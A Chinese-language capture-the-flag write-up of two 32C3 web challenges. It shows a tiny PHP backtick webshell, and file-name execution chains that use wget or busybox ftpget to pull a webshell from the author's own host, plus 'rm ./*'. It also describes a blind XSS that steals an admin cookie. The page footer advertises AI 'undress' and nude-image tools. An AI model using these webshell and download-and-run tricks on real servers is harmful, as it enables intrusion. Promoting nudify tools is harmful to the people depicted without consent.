32C3 CTF 两个Web题目的Writeup
0x00 简介
作为一个销售狗,还能做得动Web题,十分开心。 这次搞了两个题目,一个是TinyHosting,一个是Kummerkasten。
0x01 TingHosting
A new file hosting service for very small files. could you pwn it?http://136.243.194.53/
可以首先在页面中发现一个隐藏的src参数,在URL里加上?src=1之后可以返回出页面的源代码。
大概的意思就是说可以往服务器上传任意文件名的文件,不过每个文件的内容只有有7个字符那么长。
于是首先google了一下,最短的php webshell应该是14字符的这个:
#!php<?=`$_GET[1]`;
(PS:原文的该代码被转意过了,若有错误...见谅.
显然不够长啊。
后来脑洞了很多,想到了可爱的 * ,于是很重要的payload是:
#!bashz.php
内容为:
#!php<?=`*`;
刚好七个字符,不多不少,能把当前目录下的所有玩意按顺序执行一遍。
于是就要构造一些执行链了,一开始的想法是:
#!bashbusybox ftpget two.dog w.php z.php
其中前4个文件内容随意,w.php是上面的关键payload,执行w.php后其内容被我服务器上的webshell覆盖,而获取webshell。
结果悲剧的发现 busybox ftpget 支持的host只能是ip,而不支持域名。
后来想通过wget来构造,利用了302跳转可以跨协议的特点。
#!bashwget wtf.two.dog z.php
前两个文件人意内容,z.php为重要payload,即可拿下webshell。
但仔细一看,这题会在每一个人的目录下创建一个 index.html ,于是执行链被破环没法工作。
于是使用bash来先干掉index.html
构造:
#!bashbash bb index.html z.php
其中bash内容随意,bb的内容为 rm ./* 不超过7个字符。然后再通过上面的方法即可获得一个webshell,然后在根目录发现一个flag。
之后看了老外的做法真是简单好用,就利用bash、bb和z.php,bb的内容分别为 ls / , cat /f* ,简单直接0 0
0x02 Kummerkasten
Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http://136.243.194.46/Please note: This challenge does not follow the flag format.
Hints:To build the flag, concatenate both parts and omit '32C3_'
进去之后只有一个提交留言的地方,四下看了看没发现别的东西,感觉和XSS会有关。
直接丢了一个盲打cookie的payload之后收到了回显:
访问过去是403,感觉需要用XSS来读一下页面的内容。
本来的思路是XSS里带上jQuery然后用jQuery操作,结果发现页面里面有,太方便了。
直接用ajax可以轻松读取页面并回传。
看到了 /admin/bugs 和 /admin/token
根据页面中的信息来看,关键是要读两个png图片回来。
最后的payload如下:
然后把两个图里的内容,一个mysql的password和一个6位数字拼起来就是FLAG咯。
0x03 Other
更多的writeup可以参考如下链接:
https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/web
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1377
52
cURL in PHP: How to Use the PHP cURL Extension in REST APIs
Mar 14, 2025 am 11:42 AM
The PHP Client URL (cURL) extension is a powerful tool for developers, enabling seamless interaction with remote servers and REST APIs. By leveraging libcurl, a well-respected multi-protocol file transfer library, PHP cURL facilitates efficient execution of various network protocols, including HTTP, HTTPS, and FTP. This extension offers granular control over HTTP requests, supports multiple concurrent operations, and provides built-in security features.
Alipay PHP SDK transfer error: How to solve the problem of 'Cannot declare class SignData'?
Apr 01, 2025 am 07:21 AM
Alipay PHP...
Explain the concept of late static binding in PHP.
Mar 21, 2025 pm 01:33 PM
Article discusses late static binding (LSB) in PHP, introduced in PHP 5.3, allowing runtime resolution of static method calls for more flexible inheritance.Main issue: LSB vs. traditional polymorphism; LSB's practical applications and potential perfo
Explain JSON Web Tokens (JWT) and their use case in PHP APIs.
Apr 05, 2025 am 12:04 AM
JWT is an open standard based on JSON, used to securely transmit information between parties, mainly for identity authentication and information exchange. 1. JWT consists of three parts: Header, Payload and Signature. 2. The working principle of JWT includes three steps: generating JWT, verifying JWT and parsing Payload. 3. When using JWT for authentication in PHP, JWT can be generated and verified, and user role and permission information can be included in advanced usage. 4. Common errors include signature verification failure, token expiration, and payload oversized. Debugging skills include using debugging tools and logging. 5. Performance optimization and best practices include using appropriate signature algorithms, setting validity periods reasonably,
Framework Security Features: Protecting against vulnerabilities.
Mar 28, 2025 pm 05:11 PM
Article discusses essential security features in frameworks to protect against vulnerabilities, including input validation, authentication, and regular updates.
How to send a POST request containing JSON data using PHP's cURL library?
Apr 01, 2025 pm 03:12 PM
Sending JSON data using PHP's cURL library In PHP development, it is often necessary to interact with external APIs. One of the common ways is to use cURL library to send POST�...
Customizing/Extending Frameworks: How to add custom functionality.
Mar 28, 2025 pm 05:12 PM
The article discusses adding custom functionality to frameworks, focusing on understanding architecture, identifying extension points, and best practices for integration and debugging.
What exactly is the non-blocking feature of ReactPHP? How to handle its blocking I/O operations?
Apr 01, 2025 pm 03:09 PM
An official introduction to the non-blocking feature of ReactPHP in-depth interpretation of ReactPHP's non-blocking feature has aroused many developers' questions: "ReactPHPisnon-blockingbydefault...
